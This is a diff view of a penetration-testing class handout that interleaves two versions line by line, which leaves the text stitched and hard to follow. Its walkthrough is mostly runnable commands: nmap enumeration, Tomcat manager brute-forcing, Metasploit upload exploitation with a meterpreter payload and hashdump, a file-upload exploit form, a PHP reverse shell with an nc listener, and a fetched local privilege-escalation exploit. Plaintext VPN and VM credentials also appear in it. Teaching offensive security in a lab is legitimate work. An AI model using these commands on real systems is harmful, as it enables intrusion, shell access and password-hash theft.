1 | ######################################## | |
2 | # Advanced Pentester Night School # | |
3 | # By Joe McCray of Strategic Security # | |
4 | ######################################## | |
5 | ||
6 | ||
7 | Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover. | |
8 | - | # Class Virtual Machine # |
8 | + | |
9 | So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN: | |
10 | https://s3.amazonaws.com/infosecaddicts-Files/Strategic-Security-2016-VPN-Info.pdf | |
11 | ||
12 | - | Here is the VMWare virtual machine for the class: |
12 | + | sudo nmap -sP 10.0.0.0/24 |
13 | infosecaddicts | |
14 | - | https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip |
14 | + | |
15 | sudo nmap -sL 10.0.0.0/24 | |
16 | - | user: infosecaddicts |
16 | + | |
17 | - | pass: infosecaddicts |
17 | + | |
18 | ||
19 | for i in `seq 1 255`; do ping -c1 10.0.0.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done | |
20 | - | Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack. |
20 | + | |
21 | - | If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover. |
21 | + | |
22 | ||
23 | wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c | |
24 | ||
25 | gcc ipcrawl.c -o ipcrawl | |
26 | ||
27 | - | https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf |
27 | + | |
28 | ||
29 | - | Be sure to use 54.245.178.32/?src=connect for the VPN IP address instead of the one shown in the file |
29 | + | ./ipcrawl 10.0.0.1 10.0.0.254 |
30 | - | vpn username: {first_initial.last_name} example: j.mccray |
30 | + | |
31 | - | vpn password: !@#$vpn4321VPN |
31 | + | |
32 | ||
33 | wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c | |
34 | ||
35 | - | If you wants some scanning tips you should take a look at the following document: |
35 | + | |
36 | - | https://s3.amazonaws.com/infosecaddictsfiles/LabNetworkScanningV4.pdf |
36 | + | |
37 | sudo cp propecia /bin | |
38 | infosecaddicts | |
39 | ||
40 | propecia 10.0.0 22 | |
41 | ||
42 | propecia 10.0.0 3389 | |
43 | - | ---------------------------Type This----------------------------------- |
43 | + | |
44 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open | |
45 | ||
46 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}' | |
47 | ||
48 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l | |
49 | ||
50 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | |
51 | ||
52 | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt | |
53 | ||
54 | cd ~/toolz | |
55 | ||
56 | ||
57 | ||
58 | - | ----------------------------------------------------------------------- |
58 | + | |
59 | # Screenshotting the Web Servers in the Network # | |
60 | ################################################# | |
61 | cd ~/toolz/ | |
62 | - | ####################### |
62 | + | |
63 | - | # Scanning Techniques # |
63 | + | |
64 | - | ####################### |
64 | + | |
65 | - | ---------------------------Type This----------------------------------- |
65 | + | |
66 | - | sudo nmap -sL 172.31.2.0/24 |
66 | + | wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz |
67 | tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz | |
68 | cd wkhtmltox/bin/ | |
69 | sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386 | |
70 | ||
71 | ||
72 | cd ~/toolz/ | |
73 | git clone git://github.com/SpiderLabs/Nmap-Tools.git | |
74 | cd Nmap-Tools/NSE/ | |
75 | sudo cp http-screenshot.nse /usr/share/nmap/scripts/ | |
76 | infosecaddicts | |
77 | - | ./ipcrawl 172.31.2.1 172.31.2.254 |
77 | + | |
78 | sudo nmap --script-updatedb | |
79 | infosecaddicts | |
80 | ||
81 | ||
82 | cd ~/toolz/labscreenshots/ | |
83 | sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt | |
84 | infosecaddicts | |
85 | ||
86 | ||
87 | ||
88 | - | propecia 172.31.2 22 |
88 | + | |
89 | vi screenshots.sh | |
90 | - | propecia 172.31.2 80 |
90 | + | |
91 | #!/bin/bash | |
92 | - | propecia 172.31.2 443 |
92 | + | |
93 | ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html | |
94 | - | propecia 172.31.2 3389 |
94 | + | |
95 | ||
96 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | grep open |
96 | + | |
97 | ||
98 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2 " " $3}' |
98 | + | |
99 | ||
100 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' | wc -l |
100 | + | |
101 | ||
102 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' |
102 | + | |
103 | ||
104 | - | nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt |
104 | + | |
105 | ########################## | |
106 | - | cat ~/labnet-ip-list.txt |
106 | + | |
107 | - | ----------------------------------------------------------------------- |
107 | + | |
108 | sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24 | |
109 | infosecaddicts | |
110 | ||
111 | sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24 | |
112 | infosecaddicts | |
113 | ||
114 | sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24 | |
115 | - | ---------------------------Type This----------------------------------- |
115 | + | |
116 | ||
117 | sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24 | |
118 | infosecaddicts | |
119 | ||
120 | sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24 | |
121 | - | wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz |
121 | + | |
122 | ||
123 | sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24 | |
124 | infosecaddicts | |
125 | ||
126 | sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24 | |
127 | infosecaddicts | |
128 | ||
129 | sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24 | |
130 | infosecaddicts | |
131 | ||
132 | - | sudo cp http-screenshot.nse /usr/local/share/nmap/scripts/ |
132 | + | sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24 |
133 | infosecaddicts | |
134 | ||
135 | sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24 | |
136 | infosecaddicts | |
137 | ||
138 | sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24 | |
139 | infosecaddicts | |
140 | - | sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 172.31.2.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt |
140 | + | |
141 | sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24 | |
142 | - | ----------------------------------------------------------------------- |
142 | + | |
143 | ||
144 | ||
145 | ||
146 | - | ---------------------------Type This----------------------------------- |
146 | + | |
147 | - | nano screenshots.sh |
147 | + | |
148 | - | ---------------------Paste this into the file-------------------------- |
148 | + | |
149 | ######################### | |
150 | cd ~ | |
151 | echo bob >> list.txt | |
152 | echo jim >> list.txt | |
153 | - | ----------------------------------------------------------------------- |
153 | + | |
154 | echo tim >> list.txt | |
155 | echo admin >> list.txt | |
156 | echo hello >> list.txt | |
157 | - | ---------------------------Type This----------------------------------- |
157 | + | |
158 | echo test >> list.txt | |
159 | echo aaaaaa >> list.txt | |
160 | echo larry >> list.txt | |
161 | - | python -m SimpleHTTPServer |
161 | + | |
162 | - | ----------------------------------------------------------------------- |
162 | + | |
163 | echo john >> list.txt | |
164 | - | --- Now browse to the IP of your Linux machine on port 8000 (http://192.168.200.157:8000/labnet-port-80-screenshots.html): |
164 | + | |
165 | - | http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html |
165 | + | |
166 | ############## | |
167 | # Using Nmap # | |
168 | ############## | |
169 | ******** NOTE: Some of these scans may take up to an hour to run... ******** | |
170 | ******** NOTE: Open them in another terminal window and keep going ******** | |
171 | ||
172 | sudo nmap -Pn -sSV -A -p- -T5 10.0.0.120 (long scan) | |
173 | - | ---------------------------Type This----------------------------------- |
173 | + | |
174 | - | sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.0/24 |
174 | + | sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.120 |
175 | ||
176 | sudo nmap -sV -Pn -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.120 | |
177 | - | sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 172.31.2.0/24 |
177 | + | |
178 | sudo nmap -sV -Pn -p80,8080,8081,9000 --script=http-* 10.0.0.120 (long scan) | |
179 | ||
180 | - | sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 172.31.2.0/24 |
180 | + | sudo nmap -sV -Pn -p1322,59894 --script=sshv1,ssh2-enum-algos 10.0.0.120 |
181 | ||
182 | ||
183 | - | sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.0/24 |
183 | + | ******** NOTE: Some of these scans may take up to an hour to run... ******** |
184 | ******** NOTE: Open them in another terminal window and keep going ******** | |
185 | ||
186 | - | sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 172.31.2.0/24 |
186 | + | |
187 | ||
188 | ######################### | |
189 | - | sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.2.0/24 |
189 | + | # Playing with Nmap NSE # |
190 | ######################### | |
191 | ||
192 | - | sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 172.31.2.0/24 |
192 | + | nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com |
193 | ||
194 | nmap -p80 --script dns-brute infosecaddicts.com | |
195 | - | sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 172.31.2.0/24 |
195 | + | |
196 | nmap --script http-robtex-reverse-ip secore.info | |
197 | ||
198 | - | sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.2.0/24 |
198 | + | nmap -Pn -p80 --script=http-headers infosecaddicts.com |
199 | ||
200 | ||
201 | - | sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 172.31.2.0/24 |
201 | + | ls /usr/share/nmap/scripts | grep http |
202 | nmap -Pn -p80 --script=http-* infosecaddicts.com | |
203 | ||
204 | - | sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 172.31.2.0/24 |
204 | + | |
205 | ||
206 | ||
207 | - | sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 172.31.2.0/24 |
207 | + | |
208 | # Writing Your Own Nmap NSE Scripts # | |
209 | ##################################### | |
210 | ||
211 | - | sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 172.31.2.0/24 |
211 | + | |
212 | ---------------------------------------------------------------------- | |
213 | - | ----------------------------------------------------------------------- |
213 | + | sudo vi /usr/share/nmap/scripts/intro-nse.nse |
214 | ||
215 | -- The Head Section -- | |
216 | -- The Rule Section -- | |
217 | portrule = function(host, port) | |
218 | return port.protocol == "tcp" | |
219 | and port.number == 80 | |
220 | and port.state == "open" | |
221 | - | ################## |
221 | + | |
222 | - | # Day 1 Homework # |
222 | + | |
223 | - | ################## |
223 | + | |
224 | - | Take screenshots of you performing all of the tasks above. |
224 | + | |
225 | return "February class bundle!" | |
226 | - | In order to receive your certificate of proficiency you must complete all of the tasks covered in the Advanced Pentester Night School pastebin (http://pastebin.com/qnmbj04m). |
226 | + | |
227 | ---------------------------------------------------------------------- | |
228 | - | Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Pentester-Night-School-Day1-Homework.docx) |
228 | + | |
229 | - Ok, now that we've made that change let's run the script | |
230 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 | |
231 | ||
232 | ||
233 | - | IMPORTANT NOTE: |
233 | + | |
234 | - | Your homework/challenges must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST this coming Sunday. |
234 | + | |
235 | ||
236 | - | ---------------------------------------------------------------------------------------------------------------------- |
236 | + | |
237 | ---------------------------------------------------------------------- | |
238 | - | -------------------------------------------------------------------------------- |
238 | + | sudo vi /usr/share/nmap/scripts/intro-nse.nse |
239 | - | - Host Discovery - |
239 | + | |
240 | - | - ping sweep |
240 | + | |
241 | - | - tcp ping |
241 | + | |
242 | - | - zone transfer |
242 | + | |
243 | -- The Rule Section -- | |
244 | - | - Service Discovery - |
244 | + | |
245 | - | - nmap -sS <IP-RANGE> |
245 | + | |
246 | ||
247 | - | - Service Version Discovery - |
247 | + | |
248 | - | - nmap -sV <IP-RANGE> |
248 | + | |
249 | return "February class bundle!" | |
250 | - | - Vulnerability Research |
250 | + | |
251 | - | - exploit-db.com |
251 | + | |
252 | ||
253 | - | --------------didn't find anything exploitable--------------------------------- |
253 | + | |
254 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 | |
255 | - | - Deep enumeration |
255 | + | |
256 | - | - Linux (SUNRPC/NFS) |
256 | + | |
257 | - | - Win (SMB) |
257 | + | |
258 | ||
259 | - | - Enumerate the webserver ports |
259 | + | |
260 | - | - Vulnerability Scan (Nikto) |
260 | + | |
261 | - | - Directory Bruteforce (dirb) |
261 | + | |
262 | - | - Analyze source code of each page |
262 | + | OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year. |
263 | ||
264 | - | - Bruteforce ALL services |
264 | + | |
265 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
266 | ||
267 | - | ################## |
267 | + | |
268 | - | # Attacking Sedna # |
268 | + | |
269 | local http = require "http" | |
270 | ||
271 | - | Attack steps: |
271 | + | |
272 | - | ------------- |
272 | + | |
273 | ||
274 | -- The Action Section -- | |
275 | action = function(host, port) | |
276 | - | Step 1: Ping sweep the target network |
276 | + | |
277 | - | ---------------------------Type This----------------------------------- |
277 | + | |
278 | - | nmap -sP 172.31.2.0/24 |
278 | + | |
279 | - | ----------------------------------------------------------------------- |
279 | + | |
280 | ||
281 | end | |
282 | ---------------------------------------------------------------------- | |
283 | ||
284 | - Ok, now that we've made that change let's run the script | |
285 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
286 | - | Step 2: Port scan/Bannergrab the target host |
286 | + | |
287 | - | ---------------------------Type This----------------------------------- |
287 | + | |
288 | - | sudo nmap -sV 172.31.2.86 |
288 | + | |
289 | - | ----------------------------------------------------------------------- |
289 | + | |
290 | ---------------------------------------------------------------------- | |
291 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
292 | - | PORT STATE SERVICE VERSION |
292 | + | |
293 | - | 22/tcp open ssh (protocol 2.0) |
293 | + | |
294 | - | 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu |
294 | + | |
295 | - | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |
295 | + | |
296 | - | 110/tcp open pop3 Dovecot pop3d |
296 | + | |
297 | - | 111/tcp open rpcbind 2-4 (RPC #100000) |
297 | + | |
298 | - | 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA) |
298 | + | |
299 | - | 143/tcp open imap Dovecot imapd |
299 | + | |
300 | - | 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA) |
300 | + | |
301 | - | 514/tcp filtered shell |
301 | + | |
302 | - | 993/tcp open ssl/imap Dovecot imapd |
302 | + | |
303 | - | 995/tcp open ssl/pop3 Dovecot pop3d |
303 | + | |
304 | - | 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |
304 | + | |
305 | - | 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : |
305 | + | |
306 | - | SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL |
306 | + | |
307 | - | SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n"); |
307 | + | |
308 | end | |
309 | - | Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . |
309 | + | |
310 | - | Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds |
310 | + | |
311 | ---------------------------------------------------------------------- | |
312 | ||
313 | - Ok, now that we've made that change let's run the script | |
314 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
315 | ||
316 | ||
317 | ||
318 | ||
319 | ||
320 | - | Step 3: Vulnerability scan the webserver ports |
320 | + | |
321 | - | ---------------------------Type This----------------------------------- |
321 | + | |
322 | ||
323 | ||
324 | - | rm -rf nikto* |
324 | + | |
325 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
326 | - | git clone https://github.com/sullo/nikto.git Nikto2 |
326 | + | |
327 | -- The Head Section -- | |
328 | - | cd Nikto2/program |
328 | + | |
329 | local http = require "http" | |
330 | - | perl nikto.pl -h 172.31.2.86 |
330 | + | |
331 | ||
332 | - | perl nikto.pl -h 172.31.2.86:8080 |
332 | + | |
333 | - | ----------------------------------------------------------------------- |
333 | + | |
334 | ||
335 | -- The Action Section -- | |
336 | action = function(host, port) | |
337 | ||
338 | local uri = "/installing-metasploit-in-ubunt/" | |
339 | - | Step 4: Perform directory bruteforce against the target host |
339 | + | |
340 | - | ---------------------------Type This----------------------------------- |
340 | + | |
341 | - | wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl |
341 | + | |
342 | local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian") | |
343 | - | perl Webr00t.pl -h 172.31.2.86 -v |
343 | + | |
344 | - | ----------------------------------------------------------------------- |
344 | + | |
345 | ||
346 | end | |
347 | ---------------------------------------------------------------------- | |
348 | - | or with dirbuster (dirb) |
348 | + | |
349 | - Ok, now that we've made that change let's run the script | |
350 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
351 | ||
352 | ||
353 | - | ---------------------------Type This----------------------------------- |
353 | + | |
354 | ||
355 | ||
356 | - | git clone https://github.com/v0re/dirb.git |
356 | + | |
357 | ||
358 | - | cd dirb/ |
358 | + | |
359 | sudo vi /usr/share/nmap/scripts/intro-nse.nse | |
360 | - | ./configure |
360 | + | |
361 | -- The Head Section -- | |
362 | - | make |
362 | + | |
363 | local http = require "http" | |
364 | - | dirb |
364 | + | |
365 | ||
366 | - | ./dirb http://172.31.2.86 wordlists/big.txt |
366 | + | |
367 | - | ----------------------------------------------------------------------- |
367 | + | |
368 | ||
369 | - | ### dirb output ### |
369 | + | |
370 | - | ==> DIRECTORY: http://172.31.2.86/blocks/ |
370 | + | |
371 | - | ==> DIRECTORY: http://172.31.2.86/files/ |
371 | + | |
372 | - | ==> DIRECTORY: http://172.31.2.86/modules/ |
372 | + | |
373 | - | ==> DIRECTORY: http://172.31.2.86/system/ |
373 | + | |
374 | - | ==> DIRECTORY: http://172.31.2.86/themes/ |
374 | + | |
375 | if ( response.status == 200 ) then | |
376 | - | + http://172.31.2.86/robots.txt (CODE:200|SIZE:36) |
376 | + | |
377 | - | + http://172.31.2.86/server-status (CODE:403|SIZE:291) |
377 | + | |
378 | - | ### dirb output ### |
378 | + | |
379 | return "Vulnerable" | |
380 | else | |
381 | return "Not Vulnerable" | |
382 | end | |
383 | end | |
384 | - | Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0 |
384 | + | |
385 | ||
386 | - | An exploit for this application can be found at: |
386 | + | |
387 | - | https://www.exploit-db.com/exploits/40390/ |
387 | + | |
388 | - Ok, now that we've made that change let's run the script | |
389 | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443 | |
390 | ||
391 | ||
392 | ||
393 | - | -------------------save this a "BuilderEngine.html"------------------- |
393 | + | |
394 | - | <html> |
394 | + | |
395 | - | <body> |
395 | + | |
396 | - | <form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" |
396 | + | |
397 | ||
398 | - | enctype="multipart/form-data"> |
398 | + | |
399 | - | <input type="file" name="files[]" /> |
399 | + | |
400 | - | <input type="submit" value="send" /> |
400 | + | |
401 | - | </form> |
401 | + | |
402 | - | </body> |
402 | + | ******** Attacking Kevgir ******** |
403 | - | </html> |
403 | + | I figured I've give you something fun to play with. |
404 | - | ----------------------------------------------------------------------- |
404 | + | |
405 | ||
406 | ||
407 | - | Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine. |
407 | + | ############### |
408 | # Using Nikto # | |
409 | - | Change the IP address in the source code of the webshell to another server in the lab network that you have root access to. |
409 | + | ############### |
410 | cd ~/toolz/nikto-2.1.1 | |
411 | - | On the other server run: |
411 | + | |
412 | - | nc -lvp 1234 |
412 | + | perl nikto.pl -update |
413 | ||
414 | - | Then upload the pentestmonkey reverseshell to .86 |
414 | + | perl nikto.pl -h 10.0.0.120 |
415 | ||
416 | - | ============================================ Attacking another server because I need a reverse shell ========================================= |
416 | + | perl nikto.pl -h 10.0.0.120:8080 |
417 | ||
418 | perl nikto.pl -h 10.0.0.120:8081 | |
419 | ||
420 | perl nikto.pl -h 10.0.0.120:9000 | |
421 | ||
422 | ||
423 | ||
424 | ||
425 | #################### | |
426 | - | ---------------------------Type This----------------------------------- |
426 | + | # Using Metasploit # |
427 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
427 | + | #################### |
428 | - | ----------------------------------------------------------------------- |
428 | + | |
429 | - | - or if you are on a newer version of nmap - |
429 | + | |
430 | - | ---------------------------Type This----------------------------------- |
430 | + | |
431 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
431 | + | |
432 | - | ---------------------Paste this into the file-------------------------- |
432 | + | use auxiliary/scanner/http/http_version |
433 | ||
434 | set RHOSTS 10.0.0.120 | |
435 | ||
436 | set RPORT 8080 | |
437 | ||
438 | run | |
439 | ||
440 | ||
441 | ------------------------------- | |
442 | ||
443 | - | return "Network Pentester Night School!" |
443 | + | use auxiliary/scanner/http/tomcat_enum |
444 | ||
445 | set RHOSTS 10.0.0.120 | |
446 | ||
447 | set RPORT 8080 | |
448 | - | ---------------------------Type This----------------------------------- |
448 | + | |
449 | run | |
450 | - | ----------------------------------------------------------------------- |
450 | + | |
451 | - | - or if you are on a newer version of nmap - |
451 | + | |
452 | - | ---------------------------Type This----------------------------------- |
452 | + | |
453 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 |
453 | + | |
454 | - | ----------------------------------------------------------------------- |
454 | + | |
455 | #################### | |
456 | # Attacking Tomcat # | |
457 | #################### | |
458 | cd ~/toolz/metasploit | |
459 | - | ---------------------------Type This----------------------------------- |
459 | + | |
460 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
460 | + | |
461 | - | ----------------------------------------------------------------------- |
461 | + | |
462 | - | - or if you are on a newer version of nmap - |
462 | + | use auxiliary/scanner/http/http_version |
463 | - | ---------------------------Type This----------------------------------- |
463 | + | |
464 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
464 | + | set RHOSTS 10.0.0.120 |
465 | - | ---------------------Paste this into the file-------------------------- |
465 | + | |
466 | set RPORT 8080 | |
467 | ||
468 | run | |
469 | ||
470 | ||
471 | ||
472 | ||
473 | ||
474 | use auxiliary/scanner/http/tomcat_mgr_login | |
475 | - | return "Network Pentester Night School!" |
475 | + | |
476 | set USERNAME tomcat | |
477 | ||
478 | set USERPASS_FILE /home/infosecaddicts/list.txt | |
479 | ||
480 | - | --------------------------Type This----------------------------------- |
480 | + | set STOP_ON_SUCCESS true |
481 | - | udo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 |
481 | + | |
482 | - | ----------------------------------------------------------------------- |
482 | + | set RHOSTS 10.0.0.120 |
483 | - | - or if you are on a newer version of nmap - |
483 | + | |
484 | - | ---------------------------Type This----------------------------------- |
484 | + | set RPORT 8080 |
485 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443 |
485 | + | |
486 | - | ----------------------------------------------------------------------- |
486 | + | run |
487 | ||
488 | ||
489 | ||
490 | ||
491 | use exploit/multi/http/tomcat_mgr_upload | |
492 | ||
493 | - | - OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year. |
493 | + | set USERNAME tomcat |
494 | ||
495 | - | ---------------------------Type This----------------------------------- |
495 | + | set PASSWORD tomcat |
496 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
496 | + | |
497 | - | ----------------------------------------------------------------------- |
497 | + | set RHOST 10.0.0.120 |
498 | - | - or if you are on a newer version of nmap - |
498 | + | |
499 | - | ---------------------------Type This----------------------------------- |
499 | + | set RPORT 8080 |
500 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
500 | + | |
501 | - | ---------------------Paste this into the file-------------------------- |
501 | + | set PATH /manager/html |
502 | ||
503 | set PAYLOAD java/meterpreter/bind_tcp | |
504 | ||
505 | exploit | |
506 | ||
507 | ||
508 | run post/linux/gather/checkvm | |
509 | ||
510 | run post/linux/gather/enum_configs | |
511 | ||
512 | run post/linux/gather/enum_protections | |
513 | ||
514 | run post/linux/gather/enum_system | |
515 | ||
516 | run post/linux/gather/enum_users_history | |
517 | ||
518 | run post/linux/gather/hashdump | |
519 | ||
520 | - | --------------------------Type This----------------------------------- |
520 | + | shell |
521 | - | sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
521 | + | |
522 | - | ----------------------------------------------------------------------- |
522 | + | /bin/bash |
523 | - | - or if you are on a newer version of nmap - |
523 | + | |
524 | - | ---------------------------Type This----------------------------------- |
524 | + | id |
525 | - | sudo nmap --script=/usr/local/share/nmap/scripts/intro-nse.nse www.darkoperator.com -p 22,80,443 |
525 | + | |
526 | - | ----------------------------------------------------------------------- |
526 | + | uname -a |
527 | ||
528 | dpkg -l | |
529 | ||
530 | - | ---------------------------Type This----------------------------------- |
530 | + | cd /tmp |
531 | - | sudo nano /usr/share/nmap/scripts/intro-nse.nse |
531 | + | |
532 | - | ----------------------------------------------------------------------- |
532 | + | pwd |
533 | - | - or if you are on a newer version of nmap - |
533 | + | |
534 | - | ---------------------------Type This----------------------------------- |
534 | + | |
535 | - | sudo nano /usr/local/share/nmap/scripts/intro-nse.nse |
535 | + | cat >> exploit.c << out |
536 | - | ---------------------Paste this into the file-------------------------- |
536 | + | |
537 | **************paste in the content from here ***************** | |
538 | https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c | |
539 | ||
540 | ||
